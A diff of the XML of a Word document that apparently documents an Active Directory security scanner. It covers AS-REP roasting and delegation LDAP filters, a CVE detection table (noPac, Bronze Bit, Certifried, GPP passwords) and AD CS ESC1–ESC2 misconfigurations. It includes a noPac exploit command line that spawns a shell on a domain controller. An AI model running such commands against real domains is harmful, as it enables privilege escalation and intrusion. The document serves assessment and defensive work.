-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> all enabled domain accounts with the DONT_REQ_PREAUTH flag set in userAccountControl. These accounts do not require Kerberos pre-authentication, meaning any unauthenticated attacker can request an AS-REP blob for them and crack it offline. No credentials are required to perform the actual Kerberoast.</w:t>
+        <w:t>Finds all enabled domain accounts with the DONT_REQ_PREAUTH flag set in userAccountControl. These accounts do not require Kerberos pre-authentication, meaning any unauthenticated attacker can request an AS-REP blob for them and crack it offline. No credentials are required to perform the actual Kerberoast.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8448,27 +7099,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>(&amp;(userAccountControl:1.2.840.113556.1.4.</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>803:=</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>4194304)</w:t>
+              <w:t>(&amp;(userAccountControl:1.2.840.113556.1.4.803:=4194304)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8499,47 +7130,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(!(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>userAccountControl:1.2.840.113556.1.4.</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>803:=</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>2)))</w:t>
+              <w:t xml:space="preserve">  (!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8590,21 +7181,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="22" w:name="_Toc224561302"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.3  Delegation</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Mapper  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>--delegation)</w:t>
+      <w:r>
+        <w:t>4.3  Delegation Mapper  (--delegation)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="22"/>
     </w:p>
@@ -8632,13 +7210,8 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:bookmarkStart w:id="23" w:name="_Toc224561303"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.3.1  Unconstrained</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Delegation</w:t>
+      <w:r>
+        <w:t>4.3.1  Unconstrained Delegation</w:t>
       </w:r>
       <w:bookmarkEnd w:id="23"/>
     </w:p>
@@ -8710,27 +7283,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>(&amp;(userAccountControl:1.2.840.113556.1.4.</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>803:=</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>524288)</w:t>
+              <w:t>(&amp;(userAccountControl:1.2.840.113556.1.4.803:=524288)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8761,47 +7314,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(!(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>primaryGroupID=516</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>))(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>!(primaryGroupID=521)))</w:t>
+              <w:t xml:space="preserve">  (!(primaryGroupID=516))(!(primaryGroupID=521)))</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8831,13 +7344,8 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:bookmarkStart w:id="24" w:name="_Toc224561304"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.3.2  Constrained</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Delegation</w:t>
+      <w:r>
+        <w:t>4.3.2  Constrained Delegation</w:t>
       </w:r>
       <w:bookmarkEnd w:id="24"/>
     </w:p>
@@ -8849,21 +7357,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Accounts with the msDS-AllowedToDelegateTo attribute can only delegate to a specific list of SPNs. The scanner additionally checks for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (Protocol Transition / S4U2Self), which allows the account to request a Service Ticket on behalf of any user without that user </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>actually authenticating</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> first.</w:t>
+        <w:t>Accounts with the msDS-AllowedToDelegateTo attribute can only delegate to a specific list of SPNs. The scanner additionally checks for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (Protocol Transition / S4U2Self), which allows the account to request a Service Ticket on behalf of any user without that user actually authenticating first.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8891,13 +7385,8 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:bookmarkStart w:id="25" w:name="_Toc224561305"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.3.3  Resource</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-Based Constrained Delegation (RBCD)</w:t>
+      <w:r>
+        <w:t>4.3.3  Resource-Based Constrained Delegation (RBCD)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="25"/>
     </w:p>
@@ -8928,21 +7417,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="26" w:name="_Toc224561306"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>4.4  User</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Enumerator  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>--users)</w:t>
+      <w:r>
+        <w:t>4.4  User Enumerator  (--users)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="26"/>
     </w:p>
@@ -10072,23 +8548,7 @@
       <w:bookmarkStart w:id="28" w:name="_Toc224561308"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>5</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  CVE</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Detection </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Modules  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>--cves)</w:t>
+        <w:t>5.  CVE Detection Modules  (--cves)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="28"/>
     </w:p>
@@ -10940,6 +9400,350 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>gpp_passwords.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>MS14-025 (GPP Passwords)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LDAP — groupPolicyContainer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>bronze_bit.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CVE-2020-17049 (Bronze Bit)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LDAP — constrained delegation + DFL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>certifried.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CVE-2022-26923 (Certifried)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LDAP — AD CS enrollment + MAQ</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>ldap_signing.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LDAP Signing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Connection port analysis</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -10957,13 +9761,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="29" w:name="_Toc224561309"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>5.1  noPac</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — CVE-2021-42278 / CVE-2021-42287</w:t>
+      <w:r>
+        <w:t>5.1  noPac — CVE-2021-42278 / CVE-2021-42287</w:t>
       </w:r>
       <w:bookmarkEnd w:id="29"/>
     </w:p>
@@ -11109,47 +9908,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python noPac.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>lowpriv:Password</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc-ip 192.168.1.10 -shell</w:t>
+              <w:t>python noPac.py corp.local/lowpriv:Password -dc-ip 192.168.1.10 -shell</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11171,13 +9930,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="30" w:name="_Toc224561310"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>5.2  AD</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> CS Misconfigurations — ESC1 through ESC8</w:t>
+      <w:r>
+        <w:t>5.2  AD CS Misconfigurations — ESC1 through ESC8</w:t>
       </w:r>
       <w:bookmarkEnd w:id="30"/>
     </w:p>
@@ -11338,93 +10092,68 @@
                 <w:szCs w:val="20"/>
               </w:rPr>
               <w:t xml:space="preserve">Template has ENROLLEE_SUPPLIES_SUBJECT flag enabled AND a Client Authentication or Smart Card Logon </w:t>
-            </w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>EKU. Any enrollee can request a certificate for any user, including Domain Admins, by supplying a custom Subject Alternative Name.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3600" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C0392B"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>ESC2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5760" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:color w:val="333333"/>
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>EKU. Any enrollee can request a certificate for any user, including Domain Admins, by supplying a custom Subject Alternative Name.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3600" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="C0392B"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>ESC2</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="5760" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Template has </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>the Any</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
